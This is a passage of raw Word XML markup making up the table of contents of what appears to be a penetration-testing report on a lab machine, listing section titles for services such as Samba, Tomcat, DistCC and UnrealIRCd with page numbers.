          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="294BF684" w14:textId="3924633D" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118306" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>PHP-CGI-based setups vulnerability when parsing query string parameters from php filles.</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118306 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="623CEDF5" w14:textId="1808116A" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118307" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 445 Samba</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118307 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5681BF32" w14:textId="0CC79158" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118308" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Revisit SSH 23</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118308 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A90D048" w14:textId="2F1A2E61" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118309" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Brute force ssh 23</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118309 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3093424F" w14:textId="0802F286" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118310" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Linux udev Netlink Local Privilege Escalation</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118310 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C63969C" w14:textId="39F3E600" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118311" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 8180 Tomcat</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118311 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3395A435" w14:textId="0A376138" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118312" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 8009 AjP13 NVT: Apache Tomcat AJP RCE Vulnerability (Ghostcat)</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118312 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EC94E50" w14:textId="673C0A74" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118313" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5432 postgres</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118313 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BCE0A5C" w14:textId="1E63BE59" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118314" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 23 telnet</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118314 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A704736" w14:textId="434CDE50" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118315" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1099 java_rmi</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118315 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1068A9A7" w14:textId="0C9AACCF" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118316" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5900 VNC</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118316 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A4126A4" w14:textId="4A8C8DE9" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118317" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 6667, BackDoor v3.2.8.1</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118317 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5074132E" w14:textId="53119F35" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118318" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 6697 NVT: UnrealIRCd Authentication Spoong Vulnerability</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118318 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1010AEFF" w14:textId="7C627082" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118319" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 3632 DistCC RCE Vulnerability (CVE-2004-2687)</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118319 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B161399" w14:textId="49406D0A" w:rsidR="00DA362E" w:rsidRDefault="00EC3B63">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155118320" w:history="1">
        <w:r w:rsidR="00DA362E" w:rsidRPr="009240F4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 3306 MySql</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155118320 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="00DA362E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
